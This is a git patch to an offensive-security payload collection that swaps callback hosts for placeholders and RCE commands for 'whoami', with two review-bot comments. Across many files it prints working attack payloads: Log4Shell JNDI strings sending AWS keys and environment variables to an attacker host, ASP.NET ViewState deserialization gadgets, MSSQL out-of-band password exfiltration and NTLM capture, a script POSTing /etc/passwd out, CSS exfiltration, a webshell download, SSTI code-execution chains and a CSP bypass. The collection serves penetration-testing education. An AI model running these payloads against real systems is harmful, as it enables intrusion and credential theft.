From d4e6eda4ad18ee84ce61fcea4e879ec38685763e Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 22 Apr 2026 15:03:31 +0200
Subject: [PATCH] Normalize commands, callbacks and references

---
 API Key Leaks/IIS-Machine-Keys.md | 14 +++---
 Account Takeover/README.md | 12 ++---
 CONTRIBUTING.md | 2 +-
 CSS Injection/README.md | 8 ++--
 CSV Injection/README.md | 2 +-
 CVE Exploits/Log4Shell.md | 48 +++++++++----------
 Command Injection/README.md | 2 +-
 Headless Browser/README.md | 4 +-
 SAML Injection/README.md | 2 +-
 SQL Injection/MSSQL Injection.md | 36 +++++++-------
 Server Side Include Injection/README.md | 8 ++--
 .../SSRF-Advanced-Exploitation.md | 2 +-
 Server Side Template Injection/Java.md | 10 ++--
 Upload Insecure Files/README.md | 8 ++--
 XSS Injection/4 - CSP Bypass.md | 10 ++--
 XSS Injection/README.md | 20 ++++----
 XXE Injection/README.md | 40 ++++++++--------
 17 files changed, 114 insertions(+), 114 deletions(-)

diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md
index 8210e85..2898b21 100644
--- a/API Key Leaks/IIS-Machine-Keys.md
+++ b/API Key Leaks/IIS-Machine-Keys.md
@@ -98,8 +98,8 @@ Try multiple machine keys from known products, Microsoft documentation, or other
 python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r
 python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5
 python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/
- python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/
- python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/
+ python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://10.10.10.10:8080/
+ python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://10.10.10.10:8080/a1/b/c1/
 ```
 * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
@@ -143,7 +143,7 @@ First you need to decode the Viewstate to know if the MAC and the encryption are
 ### MAC Is Not Enabled
 ```ps1
-ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName"
+ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami"
 ```
 ### MAC Is Enabled And Encryption Is Disabled
@@ -159,8 +159,8 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
 * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
 ```ps1
- .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
- .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c nslookup http://attacker.com" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+ .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+ .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 # --generator = `__VIEWSTATEGENERATOR` parameter value
 # --validationkey = validation key from the previous command
@@ -175,13 +175,13 @@ If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework
 * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
 ```ps1
- .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
+ .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
 ```
 * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
 ```ps1
- .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
+ .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
 ```
 ## Edit Cookies With The Machine Key
diff --git a/Account Takeover/README.md b/Account Takeover/README.md
index bc4810b..5b3dddd 100644
--- a/Account Takeover/README.md
+++ b/Account Takeover/README.md
@@ -33,17 +33,17 @@
 ### Account Takeover Through Password Reset Poisoning
 1. Intercept the password reset request in Burp Suite
-2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
+2. Add or edit the following headers in Burp Suite : `Host: [ATTACKER.DOMAIN.TLD]`, `X-Forwarded-Host: [ATTACKER.DOMAIN.TLD]`
 3. Forward the request with the modified header
 ```http
 POST https://example.com/reset.php HTTP/1.1
 Accept: */*
 Content-Type: application/json
- Host: attacker.com
+ Host: [ATTACKER.DOMAIN.TLD]
 ```
-4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
+4. Look for a password reset URL based on the *host header* like : `https://[ATTACKER.DOMAIN.TLD]/reset-password.php?token=TOKEN`
 ### Password Reset via Email Parameter
@@ -142,7 +142,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
 ```powershell
- GET http://something.burpcollaborator.net HTTP/1.1
+ GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1
 X:
 ```
@@ -157,7 +157,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 0
- GET http://something.burpcollaborator.net HTTP/1.1
+ GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1
 X: X
 ```
@@ -173,7 +173,7 @@ Hackerone reports exploiting this bug
 ### Account Takeover via JWT
-JSON Web Token might be used to authenticate an user.
+JSON Web Token might be used to authenticate a user.
 * Edit the JWT with another User ID / Email
 * Check for weak JWT signature
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index da5febe..5c40151 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -12,7 +12,7 @@ In order to provide the safest payloads for the community, the following rules m
 - Payloads must be sanitized
 - Use `id`, and `whoami`, for RCE Proof of Concepts
- - Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
+ - Use `[ATTACKER.DOMAIN.TLD]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
 - Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses
 - Use `Administrator` for privileged users and `User` for normal account
 - Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples
diff --git a/CSS Injection/README.md b/CSS Injection/README.md
index 898b58f..67a2d0c 100644
--- a/CSS Injection/README.md
+++ b/CSS Injection/README.md
@@ -47,7 +47,7 @@ input[value^="TOKEN_012"] {
 ```css
 input[name="pin"][value="1234"] {
- background: url(https://attacker.com/log?pin=1234);
+ background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);
 }
 ```
@@ -57,7 +57,7 @@ input[name="pin"][value="1234"] {
 ```css
 input[name="csrf-token"][value^="a"] + input {
- background: url(https://example.com?q=a)
+ background: url(https://[ATTACKER.DOMAIN.TLD]/?q=a)
 }
 ```
@@ -76,8 +76,8 @@ div:has(input[value="1337"]) {
 This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks.
 ```html
-
+
+
 ```
 Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles.
diff --git a/CSV Injection/README.md b/CSV Injection/README.md
index f085834..51f80f2 100644
--- a/CSV Injection/README.md
+++ b/CSV Injection/README.md
@@ -76,7 +76,7 @@ Google Sheets allows some additional formulas that are able to fetch remote URLs
 So one can test blind formula injection or a potential for data exfiltration with:
 ```text
-=IMPORTXML("http://[REDACTED]/csv", "//a/@href")
+=IMPORTXML("http://[ATTACKER.DOMAIN.TLD]/csv", "//a/@href")
 ```
 Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.
diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md
index 4d9a9e5..31f48dc 100644
--- a/CVE Exploits/Log4Shell.md
+++ b/CVE Exploits/Log4Shell.md
@@ -45,13 +45,13 @@ bundle:config:db.password
 ## Scanning
-* [log4j-scan](https://github.com/fullhunt/log4j-scan)
+* [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) - Log4Shell scanning utility
 ```powershell
 usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
- python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
- python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
+ python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-test
+ python3 log4j-scan.py -u http://10.10.10.10:8080 --waf-bypass
 ```
 * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
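Review bot: The rewritten scan example still passes `--run-all-test`, while the usage line quoted just above it spells the option `--run-all-tests`; as written the first command would presumably be rejected by the tool's argument parser (confirm against the upstream script). Since the line is being touched anyway, fix the flag at the same time: `python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-tests`.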
@@ -59,16 +59,16 @@ bundle:config:db.password
 ## WAF Bypass
 ```powershell
-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
+${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.10:1389/a}
 # using lower and upper
-${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
-${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
+${${lower:jndi}:${lower:rmi}://10.10.10.10:1389/poc}
+${j${loWer:Nd}i${uPper::}://10.10.10.10:1389/poc}
 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
 # using env to create the letter
-${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
-${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
+${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//[ATTACKER.DOMAIN.TLD]/a}
+${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//[ATTACKER.DOMAIN.TLD]/a}
 ```
 ## Exploitation
@@ -76,32 +76,32 @@ ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attack
 ### Environment variables exfiltration
 ```powershell
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
+${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/
 # AWS Access Key
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
+${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
 ```
 ### Remote Command Execution
-* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
+* [artsploit/rogue-jndi](https://github.com/artsploit/rogue-jndi) - Rogue JNDI LDAP/RMI exploitation server
 ```ps1
- java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
- Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
- Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
- Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
- Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
- Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
- Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
- Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
- Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+ java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname "10.10.10.10"
+ Mapping ldap://10.10.10.11:1389/ to artsploit.controllers.RemoteReference
+ Mapping ldap://10.10.10.11:1389/o=reference to artsploit.controllers.RemoteReference
+ Mapping ldap://10.10.10.11:1389/o=tomcat to artsploit.controllers.Tomcat
+ Mapping ldap://10.10.10.11:1389/o=groovy to artsploit.controllers.Groovy
+ Mapping ldap://10.10.10.11:1389/o=websphere1 to artsploit.controllers.WebSphere1
+ Mapping ldap://10.10.10.11:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
+ Mapping ldap://10.10.10.11:1389/o=websphere2 to artsploit.controllers.WebSphere2
+ Mapping ldap://10.10.10.11:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
 ```
-* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
+* [pimps/JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit) - JNDI exploitation helper toolkit
 ## References
-* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
-* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
-* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
+* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - LunaSec - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
+* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - LunaSec - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
+* [PSA: Log4Shell and the current state of JNDI injection - Moritz Bechler - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 40394b2..f1d6062 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
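Review bot: The normalized rogue-jndi example passes `--hostname "10.10.10.10"` but every `Mapping ldap://…` line beneath it advertises `10.10.10.11:1389`, so the sample output no longer looks like the output of the sample command. If, as the mapping format suggests, the listed URLs are built from the supplied hostname (worth confirming against the tool), the two addresses should agree; the original lines had the same mismatch, so this is a chance to fix it rather than carry it forward. Either change the eight mapping lines to `ldap://10.10.10.10:1389/…` or the command to `--hostname "10.10.10.11"`, keeping the second address free for the target in line with the CONTRIBUTING rule.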
@@ -134,7 +134,7 @@ Sometimes, direct command execution from the injection might not be possible, bu
 ```ps1
 # -o, --output Write to file instead of stdout
- curl http://evil.attacker.com/ -o webshell.php
+ curl http://[ATTACKER.DOMAIN.TLD]/ -o webshell.php
 ```
 ### Inside A Command
diff --git a/Headless Browser/README.md b/Headless Browser/README.md
index b870500..3d7c688 100644
--- a/Headless Browser/README.md
+++ b/Headless Browser/README.md
@@ -53,7 +53,7 @@ Since the file access is allowed, an atacker can create and expose an HTML file
 async function getFlag(){
 response = await fetch("file:///etc/passwd");
 flag = await response.text();
- fetch("https://attacker.com/", { method: "POST", body: flag})
+ fetch("https://[ATTACKER.DOMAIN.TLD]/", { method: "POST", body: flag})
 };
 getFlag();
@@ -106,7 +106,7 @@ The Remote Debugging Port in a headless browser (like Headless Chrome or Chromiu
 * Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices`
 * Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs
 * Data stored in the settings (username, passwords, token): `chrome://settings`
-* Port Scan: In a loop open `http://localhost:/json/new?http://callback.example.com?port=`
+* Port Scan: In a loop open `http://localhost:/json/new?http://[ATTACKER.DOMAIN.TLD]/?port=`
 * Leak UUID: Iframe: `http://127.0.0.1:/json/version`
 ```json
diff --git a/SAML Injection/README.md b/SAML Injection/README.md
index 39d048d..f9ad7a9 100644
--- a/SAML Injection/README.md
+++ b/SAML Injection/README.md
@@ -174,7 +174,7 @@ Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_At
-
+
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index e07e464..28bc4f3 100644
--- a/SQL Injection/MSSQL Injection.md
+++ b/SQL Injection/MSSQL Injection.md
@@ -304,14 +304,14 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
 * **Permission**: Requires `VIEW SERVER STATE` permission on the server.
 ```powershell
- 1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
+ 1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.xem',null,null))
 ```
 * **Permission**: Requires the `CONTROL SERVER` permission.
 ```powershell
- 1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
- 1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
+ 1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\',default,default)))
+ 1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.trc',default))
 ```
 ### MSSQL UNC Path
@@ -319,21 +319,21 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
 MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
 ```sql
-1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
+1'; use master; exec xp_dirtree '\\10.10.10.10\SHARE';--
 ```
 ```sql
-xp_dirtree '\\attackerip\file'
-xp_fileexist '\\attackerip\file'
-BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
-BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
-RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
-RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
-RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
-RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
-RESTORE LABELONLY FROM DISK = '\\attackerip\file'
-RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
-RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
+xp_dirtree '\\10.10.10.10\file'
+xp_fileexist '\\10.10.10.10\file'
+BACKUP LOG [TESTING] TO DISK = '\\10.10.10.10\file'
+BACKUP DATABASE [TESTING] TO DISK = '\\10.10.10.10\file'
+RESTORE LOG [TESTING] FROM DISK = '\\10.10.10.10\file'
+RESTORE DATABASE [TESTING] FROM DISK = '\\10.10.10.10\file'
+RESTORE HEADERONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE FILELISTONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE LABELONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE REWINDONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE VERIFYONLY FROM DISK = '\\10.10.10.10\file'
 ```
 ## MSSQL Trusted Links
@@ -366,8 +366,8 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
 select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
 -- Create a SQL user and give sysadmin privileges
- EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
- EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
+ EXECUTE('EXECUTE(''CREATE LOGIN User WITH PASSWORD = ''''Password123'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
+ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''User'''' , ''''sysadmin'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
 ```
 ## MSSQL Privileges
@@ -402,7 +402,7 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
 ### MSSQL Make User DBA
 ```sql
-EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
+EXEC master.dbo.sp_addsrvrolemember 'User', 'sysadmin';
 ```
 ## MSSQL Database Credentials
diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index fa45604..28f2872 100644
--- a/Server Side Include Injection/README.md
+++ b/Server Side Include Injection/README.md
@@ -48,12 +48,12 @@ Surrogate-Control: content="ESI/1.0"
 | Description | Payload |
 | ----------------------- | ---------------------------------------- |
-| Blind detection | `` |
-| XSS | `` |
-| Cookie stealer | `` |
+| Blind detection | `` |
+| XSS | `` |
+| Cookie stealer | `` |
 | Include a file | `` |
 | Display debug info | `` |
-| Add header | `` |
+| Add header | `` |
 | Inline fragment | `` |
 | Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
diff --git a/Server Side Request Forgery/SSRF-Advanced-Exploitation.md b/Server Side Request Forgery/SSRF-Advanced-Exploitation.md
index 1c3e331..a1bf35b 100644
--- a/Server Side Request Forgery/SSRF-Advanced-Exploitation.md
+++ b/Server Side Request Forgery/SSRF-Advanced-Exploitation.md
@@ -120,7 +120,7 @@ The following PHP script can be used to generate a page that will redirect to th
 $commands = array(
 'HELO victim.com',
 'MAIL FROM: ',
-'RCPT To: ',
+'RCPT To: ',
 'DATA',
 'Subject: @hacker!',
 'Hello Friend',
diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md
index 043f1f1..21466d5 100644
--- a/Server Side Template Injection/Java.md
+++ b/Server Side Template Injection/Java.md
@@ -397,7 +397,7 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
 DNS lookup
 ```java
-${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}
+${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","[ATTACKER.DOMAIN.TLD]")}
 ```
 ### SpEL - Session Attributes
@@ -413,7 +413,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 - Method using `java.lang.Runtime` #1 - accessed with JavaClass
 ```java
- ${T(java.lang.Runtime).getRuntime().exec("COMMAND_HERE")}
+ ${T(java.lang.Runtime).getRuntime().exec("whoami")}
 ```
 - Method using `java.lang.Runtime` #2
@@ -427,13 +427,13 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 - Method using `java.lang.Runtime` #3 - accessed with `invoke`
 ```java
- ${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('COMMAND_HERE')}
+ ${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
 ```
 - Method using `java.lang.Runtime` #3 - accessed with `javax.script.ScriptEngineManager`
 ```java
- ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
+ ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"whoami\\\")"))}
 ```
 - Method using `java.lang.ProcessBuilder`
@@ -442,7 +442,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 ${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
 ${request.getAttribute("c").add("cmd.exe")}
 ${request.getAttribute("c").add("/k")}
- ${request.getAttribute("c").add("ping x.x.x.x")}
+ ${request.getAttribute("c").add("whoami")}
 ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
 ${request.getAttribute("a")}
 ```
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index faa39dc..d0444ce 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
@@ -162,7 +162,7 @@ PHP web shells don't always have the `
+
 ```
 ### Filename Vulnerabilities
@@ -244,11 +244,11 @@ Example of a malicious `uwsgi.ini` file:
 ; read from a symbol
 foo = @(sym://uwsgi_funny_function)
 ; read from binary appended data
-bar = @(data://[REDACTED])
+bar = @(data://[ATTACKER.DOMAIN.TLD])
 ; read from http
-test = @(http://[REDACTED])
+test = @(http://[ATTACKER.DOMAIN.TLD])
 ; read from a file descriptor
-content = @(fd://[REDACTED])
+content = @(fd://[ATTACKER.DOMAIN.TLD])
 ; read from a process stdout
 body = @(exec://whoami)
 ; call a function returning a char *
diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md
index 84d6e9a..79e9306 100644
--- a/XSS Injection/4 - CSP Bypass.md
+++ b/XSS Injection/4 - CSP Bypass.md
@@ -50,11 +50,11 @@ Use a callback function from a whitelisted source listed in the CSP.
 **Payload**:
-`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
+`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//[ATTACKER.DOMAIN.TLD]/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
 ```js
 script=document.createElement('script');
-script.src='//remoteattacker.lab/csp.js';
+script.src='//[ATTACKER.DOMAIN.TLD]/csp.js';
 window.frames[0].document.head.appendChild(script);
 ```
